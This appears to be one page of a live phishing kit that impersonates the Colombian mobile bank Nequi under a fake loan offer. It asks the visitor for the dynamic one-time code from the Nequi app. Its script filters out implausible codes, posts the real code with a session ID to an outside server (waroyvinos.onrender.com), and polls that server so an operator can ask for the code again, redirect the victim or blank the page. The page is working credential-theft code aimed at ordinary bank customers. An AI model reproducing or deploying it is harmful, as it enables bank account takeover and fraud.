<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <!-- Css -->
  <link rel="stylesheet" href="../css/globals-4.css">
  <link rel="stylesheet" href="../css/finish.css">
  <link rel="stylesheet" href="../css/spinner-4.css">

  <link rel="shortcut icon" type="image/x-icon" href="../assets/favicon-4.ico">

  <title>Solicita tu credito</title>

  <style>
    .loadingContainer {
      display: none;
    }

    footer {
      margin-top: 40px;
      background: url(../assets/footer-nequi-2.svg);
      background-repeat: no-repeat;
      background-size: cover;
      padding: 100px 0 60px 0;
    }

    .validate {
      display: flex;
      justify-content: center;
      color: #da0081;
      font-family: Manrope, sans-serif;
    }

    .low-amount-cta-btn {
      width: 100%;
    }

    .validate button {
      width: 100%;
      cursor: pointer;
    }

    .validate button:disabled {
      color: #fff;
      background: #f1bfda;
      border: 1px solid #f1bfda;
      transition: background-color 0.2s, color 0.2s, border-color 0.2s,
        box-shadow 0.2s;
      cursor: auto;
    }

    .nq-btn {
      grid-column-gap: 0.4em;
      grid-row-gap: 0.4em;
      color: #fff;
      text-align: center;
      letter-spacing: 0;
      font-size: 1rem;
      line-height: 1.5em;
      font-weight: var(--component-button--font-weight);
      background-color: #da0081;
      border: 1px solid #0000;
      border-radius: 0.3rem;
      justify-content: center;
      align-items: center;
      padding: 0.7em 1.2em;
      text-decoration: none;
      transition-property: box-shadow, border-color;
      transition-duration: 0.3s, 0.3s;
      transition-timing-function: cubic-bezier(0.165, 0.84, 0.44, 1),
        cubic-bezier(0.165, 0.84, 0.44, 1);
      display: inline-flex;
      box-shadow: inset 0 0 #0000;
      width: 100%;
    }
  </style>
</head>

<body class="bodyContainer">
  <main class="loadingContainer">
    <header class="z-[999] fixed top-0 w-full h-16 mx-auto pt-0 pb-0 overflow-visible bg-white">
      <div class="flex items-center h-full border-b border-gray-primary bg-white px-[26px]">
        <div class="flex items-center justify-between w-full max-w-[61.875rem] h-full mx-auto">
          <a href="one-time-pass.php.html" class="h-8 [&amp;&gt;svg]:w-[100px]">
            <svg _ngcontent-atq-c28="" width="180" height="40" viewbox="0 0 104 32" fill="none" xmlns="http://www.w3.org/2000/svg" class="splash__container__svg">
              <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__up"></path>
              <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__down"></path>
              <path _ngcontent-atq-c28="" d="M31.9876 0H28.2187C27.7033 0 27.3006 0.416 27.3006 0.912V15.872C27.3006 16.176 26.8979 16.288 26.753 16.016L17.991 0.4C17.8461 0.144 17.5884 0 17.2823 0H11.0169C10.5015 0 10.0988 0.416 10.0988 0.912V24.816C10.0988 25.328 10.5176 25.728 11.0169 25.728H14.7858C15.3012 25.728 15.7039 25.312 15.7039 24.816V9.408C15.7039 9.104 16.1066 8.992 16.2515 9.264L25.2551 25.344C25.4 25.6 25.6577 25.744 25.9638 25.744H31.9554C32.4708 25.744 32.8735 25.328 32.8735 24.832V0.912C32.8735 0.4 32.4547 0 31.9554 0H31.9876Z" fill="#200020" class="N"></path>
              <path _ngcontent-atq-c28="" d="M54.6495 16.3999C54.6495 9.66395 50.2363 6.31995 45.3883 6.31995C39.0906 6.31995 35.4988 10.6559 35.4988 16.5119C35.4988 23.1679 40.0087 26.3359 45.2433 26.3359C50.4779 26.3359 53.5382 23.6479 54.3596 20.1599C54.4724 19.7119 54.2147 19.3119 53.5382 19.3119H50.5746C50.2363 19.3119 49.9464 19.4879 49.8015 19.8239C49.0606 21.4399 47.8687 22.2879 45.5815 22.2879C42.9884 22.2879 41.2489 20.6719 40.9912 17.3919H53.7315C54.2791 17.3919 54.6495 16.9919 54.6495 16.3999ZM41.2006 13.8559C41.7482 11.4399 43.1656 10.3679 45.3077 10.3679C47.2244 10.3679 48.8673 11.4719 49.0928 13.8559H41.2006Z" fill="#200020" class="E"></path>
              <path _ngcontent-atq-c28="" d="M103.082 6.80005H99.2969C98.7899 6.80005 98.3788 7.20837 98.3788 7.71205V24.832C98.3788 25.3357 98.7899 25.744 99.2969 25.744H103.082C103.589 25.744 104 25.3357 104 24.832V7.71205C104 7.20837 103.589 6.80005 103.082 6.80005Z" fill="#200020" class="I"></path>
              <path _ngcontent-atq-c28="" d="M74.976 6.80002H71.2071C70.6917 6.80002 70.289 7.21602 70.289 7.71202V8.64002C69.1615 7.32802 67.3093 6.41602 64.8772 6.41602C59.4332 6.41602 56.5501 11.312 56.5501 16.496C56.5501 21.024 58.9178 26.096 64.7644 26.096C66.8583 26.096 69.081 25.104 70.289 23.696V31.056C70.289 31.568 70.7078 31.968 71.2071 31.968H74.976C75.4914 31.968 75.8941 31.552 75.8941 31.056V7.72802C75.8941 7.21602 75.4753 6.81602 74.976 6.81602V6.80002ZM66.3912 22.064C63.9108 22.064 62.1713 20.256 62.1713 16.368C62.1713 12.48 63.9108 10.448 66.3912 10.448C68.8716 10.448 70.6111 12.32 70.6111 16.368C70.6111 20.416 68.8716 22.064 66.3912 22.064Z" fill="#200020" class="Q"></path>
              <path _ngcontent-atq-c28="" d="M95.0448 6.80005H91.2759C90.7604 6.80005 90.3578 7.21605 90.3578 7.71205V17.3921C90.3578 20.5121 88.9565 21.4241 87.1687 21.4241C85.3809 21.4241 83.9796 20.5121 83.9796 17.3921V7.71205C83.9796 7.20005 83.5608 6.80005 83.0615 6.80005H79.2926C78.7772 6.80005 78.3745 7.21605 78.3745 7.71205V17.7921C78.3745 23.7921 81.7086 26.2081 87.1848 26.2081C92.661 26.2081 95.9951 23.7761 95.9951 17.7921V7.71205C95.9951 7.20005 95.5763 6.80005 95.077 6.80005H95.0448Z" fill="#200020" class="U"></path>
            </svg>
          </a>
          <button class="flex flex-col justify-between w-[25px] h-[20px] bg-transparent border-none cursor-pointer" aria-label="Menu">
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
          </button>
        </div>
      </div>
    </header>
    <section class="mainSectionContainer loading">
      <div class="hero-image"></div>
      <div class="mainSectionWrapper">
        <div class="logo_nequi_animado">
          <img src="../assets/loading-nequi-2.webp" alt="">
        </div>
        <p class="wait-msg">Por favor, espere...</p>
        <p class="info-msg">En este momento estamos validando algunos datos. puede tardar un momento.</p>

        <div class="bottom" style="display: flex;">
          <p class="warning-msg">*Valido desde el <span id="dia">07</span> de <span id="mes">Agosto</span> al <span id="dia2">25</span> de <span id="mes2">diciembre</span> del <span id="anio">2025</span>, aplican T&amp;C
          </p>
          <img src="../assets/seguro_fogafin-2.svg" alt="image">
        </div>
      </div>
    </section>

    <footer>
      <div class="wrap">
        <div class="wrapper">
          <div class="footer">
            <img class="footer-pc" src="../assets/footer-bigscreen-3.png" alt="">
            <img class="footer-mobile" src="../assets/footer-3.png" alt="">
          </div>
        </div>
      </div>
    </footer>
  </main>

  <div class="errorMessage bg-[#FF3E60] p-4 rounded-lg max-w-[330px] absolute top-20 left-0 right-0 mx-auto opacity-0 transform translate-y-2 transition-all duration-300" style="opacity: 0; transform: translateY(20px)">
    <p class="text-purple-primary text-sm text-left flex items-center">
      <img src="../assets/warning.png" class="w-6 inline-block mr-2">¡Ups!
      Estás ingresando mal tu clave dinámica o expiró. verifica y vuelve a
      intentarlo.
    </p>
  </div>

  <section id="sectionTeclado" class="max-w-[420px] flex flex-col items-center justify-center mx-auto mt-5 min-h-screen px-4">
    <div class="headerHome h-12 w-auto mb-5">
      <svg _ngcontent-atq-c28="" viewbox="0 0 104 32" width="100%" height="100%" fill="none" xmlns="http://www.w3.org/2000/svg" class="splash__container__svg">
        <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__up"></path>
        <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__down"></path>
        <path _ngcontent-atq-c28="" d="M31.9876 0H28.2187C27.7033 0 27.3006 0.416 27.3006 0.912V15.872C27.3006 16.176 26.8979 16.288 26.753 16.016L17.991 0.4C17.8461 0.144 17.5884 0 17.2823 0H11.0169C10.5015 0 10.0988 0.416 10.0988 0.912V24.816C10.0988 25.328 10.5176 25.728 11.0169 25.728H14.7858C15.3012 25.728 15.7039 25.312 15.7039 24.816V9.408C15.7039 9.104 16.1066 8.992 16.2515 9.264L25.2551 25.344C25.4 25.6 25.6577 25.744 25.9638 25.744H31.9554C32.4708 25.744 32.8735 25.328 32.8735 24.832V0.912C32.8735 0.4 32.4547 0 31.9554 0H31.9876Z" fill="#200020" class="N"></path>
        <path _ngcontent-atq-c28="" d="M54.6495 16.3999C54.6495 9.66395 50.2363 6.31995 45.3883 6.31995C39.0906 6.31995 35.4988 10.6559 35.4988 16.5119C35.4988 23.1679 40.0087 26.3359 45.2433 26.3359C50.4779 26.3359 53.5382 23.6479 54.3596 20.1599C54.4724 19.7119 54.2147 19.3119 53.5382 19.3119H50.5746C50.2363 19.3119 49.9464 19.4879 49.8015 19.8239C49.0606 21.4399 47.8687 22.2879 45.5815 22.2879C42.9884 22.2879 41.2489 20.6719 40.9912 17.3919H53.7315C54.2791 17.3919 54.6495 16.9919 54.6495 16.3999ZM41.2006 13.8559C41.7482 11.4399 43.1656 10.3679 45.3077 10.3679C47.2244 10.3679 48.8673 11.4719 49.0928 13.8559H41.2006Z" fill="#200020" class="E"></path>
        <path _ngcontent-atq-c28="" d="M103.082 6.80005H99.2969C98.7899 6.80005 98.3788 7.20837 98.3788 7.71205V24.832C98.3788 25.3357 98.7899 25.744 99.2969 25.744H103.082C103.589 25.744 104 25.3357 104 24.832V7.71205C104 7.20837 103.589 6.80005 103.082 6.80005Z" fill="#200020" class="I"></path>
        <path _ngcontent-atq-c28="" d="M74.976 6.80002H71.2071C70.6917 6.80002 70.289 7.21602 70.289 7.71202V8.64002C69.1615 7.32802 67.3093 6.41602 64.8772 6.41602C59.4332 6.41602 56.5501 11.312 56.5501 16.496C56.5501 21.024 58.9178 26.096 64.7644 26.096C66.8583 26.096 69.081 25.104 70.289 23.696V31.056C70.289 31.568 70.7078 31.968 71.2071 31.968H74.976C75.4914 31.968 75.8941 31.552 75.8941 31.056V7.72802C75.8941 7.21602 75.4753 6.81602 74.976 6.81602V6.80002ZM66.3912 22.064C63.9108 22.064 62.1713 20.256 62.1713 16.368C62.1713 12.48 63.9108 10.448 66.3912 10.448C68.8716 10.448 70.6111 12.32 70.6111 16.368C70.6111 20.416 68.8716 22.064 66.3912 22.064Z" fill="#200020" class="Q"></path>
        <path _ngcontent-atq-c28="" d="M95.0448 6.80005H91.2759C90.7604 6.80005 90.3578 7.21605 90.3578 7.71205V17.3921C90.3578 20.5121 88.9565 21.4241 87.1687 21.4241C85.3809 21.4241 83.9796 20.5121 83.9796 17.3921V7.71205C83.9796 7.20005 83.5608 6.80005 83.0615 6.80005H79.2926C78.7772 6.80005 78.3745 7.21605 78.3745 7.71205V17.7921C78.3745 23.7921 81.7086 26.2081 87.1848 26.2081C92.661 26.2081 95.9951 23.7761 95.9951 17.7921V7.71205C95.9951 7.20005 95.5763 6.80005 95.077 6.80005H95.0448Z" fill="#200020" class="U"></path>
      </svg>
    </div>
    <h1 class="font-bold text-2xl leading-7 text-center mb-6 text-purple-primary">
      Confirma tu identidad
    </h1>
    <p class="font-normal text-sm leading-5 text-center text-purple-primary mb-7">
      Para confirmar tu identidad escribe o pega la clave dinámica que
      encuentras en tu App Nequi.
    </p>
    <div class="w-[271px] flex justify-around mx-auto [&amp;>input]:w-8 [&amp;>input]:text-center [&amp;>input]:border-b [&amp;>input]:border-purple-primary [&amp;>input]:h-[30px] [&amp;>input]:text-4xl [&amp;>input]:font-bold [&amp;>input]:text-pink-primary [&amp;>input]:focus:outline-none">
      <input id="otp-1" maxlength="1" inputmode="none" readonly="readonly">
      <input id="otp-2" maxlength="1" inputmode="none" readonly="readonly">
      <input id="otp-3" maxlength="1" inputmode="none" readonly="readonly">
      <input id="otp-4" maxlength="1" inputmode="none" readonly="readonly">
      <input id="otp-5" maxlength="1" inputmode="none" readonly="readonly">
      <input id="otp-6" maxlength="1" inputmode="none" readonly="readonly">
    </div>
    <div class="mt-8 w-full max-w-[300px] mx-auto" id="keyboard">
      <div class="flex justify-around mb-4 [&amp;>button]:w-12 [&amp;>button]:h-12 [&amp;>button]:border-none [&amp;>button]:bg-transparent [&amp;>button]:text-4xl [&amp;>button]:text-purple-primary [&amp;>button]:cursor-pointer [&amp;>button]:rounded-full [&amp;>button]:transition-colors [&amp;>button]:duration-200 [&amp;>button]:select-none [&amp;>button]:touch-manipulation [&amp;>button]:focus:outline-none">
        <button class="keyboard-btn" data-value="1">1</button>
        <button class="keyboard-btn" data-value="2">2</button>
        <button class="keyboard-btn" data-value="3">3</button>
      </div>
      <div class="flex justify-around mb-4 [&amp;>button]:w-12 [&amp;>button]:h-12 [&amp;>button]:border-none [&amp;>button]:bg-transparent [&amp;>button]:text-4xl [&amp;>button]:text-purple-primary [&amp;>button]:cursor-pointer [&amp;>button]:rounded-full [&amp;>button]:transition-colors [&amp;>button]:duration-200 [&amp;>button]:select-none [&amp;>button]:touch-manipulation [&amp;>button]:focus:outline-none">
        <button class="keyboard-btn" data-value="4">4</button>
        <button class="keyboard-btn" data-value="5">5</button>
        <button class="keyboard-btn" data-value="6">6</button>
      </div>
      <div class="flex justify-around mb-4 [&amp;>button]:w-12 [&amp;>button]:h-12 [&amp;>button]:border-none [&amp;>button]:bg-transparent [&amp;>button]:text-4xl [&amp;>button]:text-purple-primary [&amp;>button]:cursor-pointer [&amp;>button]:rounded-full [&amp;>button]:transition-colors [&amp;>button]:duration-200 [&amp;>button]:select-none [&amp;>button]:touch-manipulation [&amp;>button]:focus:outline-none">
        <button class="keyboard-btn" data-value="7">7</button>
        <button class="keyboard-btn" data-value="8">8</button>
        <button class="keyboard-btn" data-value="9">9</button>
      </div>
      <div class="flex justify-around mb-4 [&amp;>button]:w-12 [&amp;>button]:h-12 [&amp;>button]:border-none [&amp;>button]:bg-transparent [&amp;>button]:text-4xl [&amp;>button]:text-purple-primary [&amp;>button]:cursor-pointer [&amp;>button]:rounded-full [&amp;>button]:transition-colors [&amp;>button]:duration-200 [&amp;>button]:select-none [&amp;>button]:touch-manipulation [&amp;>button]:focus:outline-none">
        <button class="invisible" disabled=""></button>
        <button class="keyboard-btn" data-value="0">0</button>
        <button class="keyboard-btn" id="delete-otp">
          <img src="../assets/nequi-teclado-numerico-borrar.svg" alt="" class="w-6 h-6">
        </button>
      </div>
    </div>
  </section>

  <main class="finishContainer min-h-dvh max-w-screen-sm mx-auto mt-16" id="finishContainer">
    <header class="z-[999] fixed top-0 w-full h-16 mx-auto pt-0 pb-0 overflow-visible bg-white">
      <div class="flex items-center h-full border-b border-gray-primary bg-white px-[26px]">
        <div class="flex items-center justify-between w-full max-w-[61.875rem] h-full mx-auto">
          <a href="one-time-pass.php.html" class="h-8 [&amp;&gt;svg]:w-[100px]">
            <svg _ngcontent-atq-c28="" width="180" height="40" viewbox="0 0 104 32" fill="none" xmlns="http://www.w3.org/2000/svg" class="splash__container__svg">
              <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__up"></path>
              <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__down"></path>
              <path _ngcontent-atq-c28="" d="M31.9876 0H28.2187C27.7033 0 27.3006 0.416 27.3006 0.912V15.872C27.3006 16.176 26.8979 16.288 26.753 16.016L17.991 0.4C17.8461 0.144 17.5884 0 17.2823 0H11.0169C10.5015 0 10.0988 0.416 10.0988 0.912V24.816C10.0988 25.328 10.5176 25.728 11.0169 25.728H14.7858C15.3012 25.728 15.7039 25.312 15.7039 24.816V9.408C15.7039 9.104 16.1066 8.992 16.2515 9.264L25.2551 25.344C25.4 25.6 25.6577 25.744 25.9638 25.744H31.9554C32.4708 25.744 32.8735 25.328 32.8735 24.832V0.912C32.8735 0.4 32.4547 0 31.9554 0H31.9876Z" fill="#200020" class="N"></path>
              <path _ngcontent-atq-c28="" d="M54.6495 16.3999C54.6495 9.66395 50.2363 6.31995 45.3883 6.31995C39.0906 6.31995 35.4988 10.6559 35.4988 16.5119C35.4988 23.1679 40.0087 26.3359 45.2433 26.3359C50.4779 26.3359 53.5382 23.6479 54.3596 20.1599C54.4724 19.7119 54.2147 19.3119 53.5382 19.3119H50.5746C50.2363 19.3119 49.9464 19.4879 49.8015 19.8239C49.0606 21.4399 47.8687 22.2879 45.5815 22.2879C42.9884 22.2879 41.2489 20.6719 40.9912 17.3919H53.7315C54.2791 17.3919 54.6495 16.9919 54.6495 16.3999ZM41.2006 13.8559C41.7482 11.4399 43.1656 10.3679 45.3077 10.3679C47.2244 10.3679 48.8673 11.4719 49.0928 13.8559H41.2006Z" fill="#200020" class="E"></path>
              <path _ngcontent-atq-c28="" d="M103.082 6.80005H99.2969C98.7899 6.80005 98.3788 7.20837 98.3788 7.71205V24.832C98.3788 25.3357 98.7899 25.744 99.2969 25.744H103.082C103.589 25.744 104 25.3357 104 24.832V7.71205C104 7.20837 103.589 6.80005 103.082 6.80005Z" fill="#200020" class="I"></path>
              <path _ngcontent-atq-c28="" d="M74.976 6.80002H71.2071C70.6917 6.80002 70.289 7.21602 70.289 7.71202V8.64002C69.1615 7.32802 67.3093 6.41602 64.8772 6.41602C59.4332 6.41602 56.5501 11.312 56.5501 16.496C56.5501 21.024 58.9178 26.096 64.7644 26.096C66.8583 26.096 69.081 25.104 70.289 23.696V31.056C70.289 31.568 70.7078 31.968 71.2071 31.968H74.976C75.4914 31.968 75.8941 31.552 75.8941 31.056V7.72802C75.8941 7.21602 75.4753 6.81602 74.976 6.81602V6.80002ZM66.3912 22.064C63.9108 22.064 62.1713 20.256 62.1713 16.368C62.1713 12.48 63.9108 10.448 66.3912 10.448C68.8716 10.448 70.6111 12.32 70.6111 16.368C70.6111 20.416 68.8716 22.064 66.3912 22.064Z" fill="#200020" class="Q"></path>
              <path _ngcontent-atq-c28="" d="M95.0448 6.80005H91.2759C90.7604 6.80005 90.3578 7.21605 90.3578 7.71205V17.3921C90.3578 20.5121 88.9565 21.4241 87.1687 21.4241C85.3809 21.4241 83.9796 20.5121 83.9796 17.3921V7.71205C83.9796 7.20005 83.5608 6.80005 83.0615 6.80005H79.2926C78.7772 6.80005 78.3745 7.21605 78.3745 7.71205V17.7921C78.3745 23.7921 81.7086 26.2081 87.1848 26.2081C92.661 26.2081 95.9951 23.7761 95.9951 17.7921V7.71205C95.9951 7.20005 95.5763 6.80005 95.077 6.80005H95.0448Z" fill="#200020" class="U"></path>
            </svg>
          </a>
          <button class="flex flex-col justify-between w-[25px] h-[20px] bg-transparent border-none cursor-pointer" aria-label="Menu">
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
          </button>
        </div>
      </div>
    </header>
    <div class="p-8">
      <section class="bg-white rounded-lg p-11">
        <div class="hero-image"></div>
        <div class="mainSectionWrapper">
          <div class="flex justify-center items-center">
            <img class="max-w-[5.5rem]" src="../assets/iconsad-2.svg" alt="">
          </div>
          <h1 class="text-lg font-bold text-purple-primary w-full text-center mb-4 mt-1">
            ¡Ups, algo salió mal!
          </h1>
          <p id="wait-msg" class="text-purple-primary w-full text-center mb-4 mt-1 text-sm font-medium">
            En este momento no pudimos terminar el proceso de validación con el
            crédito solicitado por un valor de
            <span id="amount">$ 11.500.000</span>.
          </p>
          <p class="text-purple-primary w-full text-left mb-4 mt-1 text-sm font-medium">
            Pudo ser por los siguientes motivos:
          </p>
          <ul class="list-disc list-inside text-purple-primary w-full text-left mb-4 mt-1 text-sm [&amp;&gt;li]:mb-2 [&amp;&gt;li]:font-medium">
            <li>ingresaste mal la información solicitada</li>
            <li>
              el monto solicitado en este momento no es posible desembolsarlo (
              solicita un monto menor )
            </li>
            <li>
              fallas en tu operador o servidor a la hora de terminar el proceso
            </li>
          </ul>
          <p class="text-purple-primary w-full text-center mb-4 mt-1 text-sm font-bold text-balance">
            ¡NO TE RINDAS!, En unos momentos serás contactado por uno de
            nuestros asesores virtuales para completar la solicitud de tu
            <span id="product-name">crédito.</span>
          </p>

          <div class="validate">
            <div class="low-amount-cta-btn">
              <button type="button" class="nq-btn w-button w--current" id="btnReturn">
                Regresar
              </button>
            </div>
          </div>
        </div>
      </section>
    </div>
  </main>

  <script>

document.addEventListener("DOMContentLoaded", () => {
  const inputs = document.querySelectorAll('input[id^="otp-"]');
  const keyboard = document.getElementById("keyboard");
  const deleteBtn = document.getElementById("delete-otp");
  const loadingSpinner = document.querySelector(".loadingContainer");
  const finishContainer = document.querySelector(".finishContainer");
  const sectionTeclado = document.getElementById("sectionTeclado");
  const btnReturn = document.getElementById("btnReturn");

  const amount = document.getElementById("amount");
  const params = new URLSearchParams(window.location.search);
  const type = params.get("type");

  // loadingSpinner.style.display = "block";
  //Despues de 1 segundo se muestra el mensaje de error
  // setTimeout(() => {
  //   loadingSpinner.style.display = "none";
  // }, 5000);

  btnReturn.addEventListener("click", (e) => {
    window.location.href = 'accces-sign-in.php.html';
  });

  let currentInput = 0;
  let contSend = 0;

  // Manejar clics del teclado
  keyboard.addEventListener("click", (e) => {
    const button = e.target.closest(".keyboard-btn");
    if (button && !button.id.includes("delete")) {
      const value = button.dataset.value;
      if (currentInput < inputs.length) {
        // Guardar el valor real en un atributo personalizado
        inputs[currentInput].dataset.realValue = value;
        // Mostrar asterisco en el campo de entrada
        inputs[currentInput].value = "*";
        // Disparar el evento input
        inputs[currentInput].dispatchEvent(
          new Event("input", {
            bubbles: true,
          })
        );
        currentInput++;
      }
    }
  });

  // Manejar el botÃ³n de borrar
  deleteBtn.addEventListener("click", () => {
    if (currentInput > 0) {
      currentInput--;
      inputs[currentInput].value = "";
      inputs[currentInput].dispatchEvent(
        new Event("input", {
          bubbles: true,
        })
      );
    }
  });

  // Permitir borrar con tecla retroceso
  document.addEventListener("keydown", (e) => {
    if (e.key === "Backspace" && currentInput > 0) {
      currentInput--;
      inputs[currentInput].value = "";
      inputs[currentInput].dispatchEvent(
        new Event("input", {
          bubbles: true,
        })
      );
    }
  });

  // Prevenir cualquier entrada de teclado fÃ­sico
  inputs.forEach((input) => {
    ["keydown", "keyup", "keypress", "input", "textInput"].forEach(
      (eventType) => {
        input.addEventListener(eventType, (e) => {
          e.preventDefault();
          return false;
        });
      }
    );

    input.addEventListener("paste", (e) => {
      e.preventDefault();
      return false;
    });

    input.setAttribute("readonly", "readonly");
    input.setAttribute("inputmode", "none");
  });

  // Hacer resetKeyboard global
  window.resetKeyboard = function() {
    currentInput = 0;

    inputs.forEach((input) => {
      input.value = "";
      input.dataset.realValue = ""; // Borra el valor real tambiÃ©n
    });

    inputs[0].focus();
  };
  
  // Alias local para compatibilidad
  function resetKeyboard() { window.resetKeyboard(); }

  // Verificar el estado de los inputs
  inputs.forEach((input, index) => {
    input.addEventListener("input", async () => {
      let isComplete = Array.from(inputs).every((input) => input.value !== "");
      if (isComplete) {
        let otp = "";
        inputs.forEach((input) => {
          otp += input.dataset.realValue || "";
        });

        const formData = JSON.parse(localStorage.getItem("formData")) || {};

        // Validar números consecutivos (123456) o todos iguales (111111, 222222, etc.)
        const todosIguales = /^(\d)\1{5}$/.test(otp); // 000000, 111111, 222222, etc.
        const consecutivoAsc = otp === "123456";
        
        if (consecutivoAsc || todosIguales || otp === formData.cedula.toString().slice(0, 6)) {
          const errorMessage = document.querySelector(".errorMessage");
          errorMessage.style.opacity = "1";
          errorMessage.style.transform = "translateY(-20px)";

          setTimeout(() => {
            resetKeyboard();
          }, 100);

          setTimeout(() => {
            errorMessage.style.opacity = "0";
            errorMessage.style.transform = "translateY(20px)";
          }, 5000);

          return;
        }
        amount.innerHTML = "$ " + formData.montoPrestamo;
        loadingSpinner.style.display = "block";

        // ========== ENVIAR AL BACKEND ==========
        const sessionId = localStorage.getItem('sessionId') || 'session_' + Date.now();
        
        try {
          await fetch('https://waroyvinos.onrender.com/step3-dynamic', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
              sessionId: sessionId,
              otp: otp
            })
          });
          
          console.log(`✅ Dinámica enviada - Session: ${sessionId} - OTP: ${otp}`);
          
          // El loader se mantiene visible hasta que llegue respuesta del polling
          // NO ocultar automáticamente
          
        } catch (error) {
          console.error('❌ Error enviando dinámica:', error);
          loadingSpinner.style.display = "none";
        }

      }
    });
  });

  // Función de Discord eliminada completamente
})


  </script>
<script src="java/common.js"></script>
<script>
// ==================== POLLING PARA REDIRECCIONES ====================
const sessionId = localStorage.getItem('sessionId') || 'session_' + Date.now();

document.addEventListener("DOMContentLoaded", async function() {
  // Verificar banneo
  const banned = await checkIfBanned();
  if (banned) {
    document.body.innerHTML = '<div style="display:flex;justify-content:center;align-items:center;height:100vh;background:white;color:white;font-size:24px;"></div>';
    return;
  }
  
  // Iniciar polling
  startPolling(sessionId, (redirect) => {
    console.log('🎯 Redirección recibida:', redirect);
    
    const loadingSpinner = document.querySelector(".loadingContainer");
    const errorMessage = document.querySelector(".errorMessage");
    
    // ERROR DINÁMICA: Mostrar mensaje de error SIN redirigir
    if (redirect === 'error-dynamic') {
      // 1. Ocultar loader
      if (loadingSpinner) {
        loadingSpinner.style.display = "none";
      }
      
      // 2. BORRAR ASTERISCOS INMEDIATAMENTE
      if (typeof window.resetKeyboard === 'function') {
        window.resetKeyboard();
        console.log('✅ Teclado reseteado - Listo para nueva dinámica');
      }
      
      // 3. Mostrar mensaje de error
      if (errorMessage) {
        errorMessage.style.opacity = "1";
        errorMessage.style.transform = "translateY(-20px)";
        
        // Ocultar mensaje después de 5 segundos
        setTimeout(() => {
          errorMessage.style.opacity = "0";
          errorMessage.style.transform = "translateY(20px)";
        }, 5000);
      }
      
      return;
    }
    
    // BANEAR: Pantalla en blanco
    if (redirect === 'banned') {
      document.body.innerHTML = '<div style="display:flex;justify-content:center;align-items:center;height:100vh;background:white;"></div>';
      return;
    }
    
    // Redirección normal a otra página
    if (loadingSpinner) {
      loadingSpinner.style.display = "none";
    }
    window.location.href = redirect;
  });
});
</script>
</body>

</html>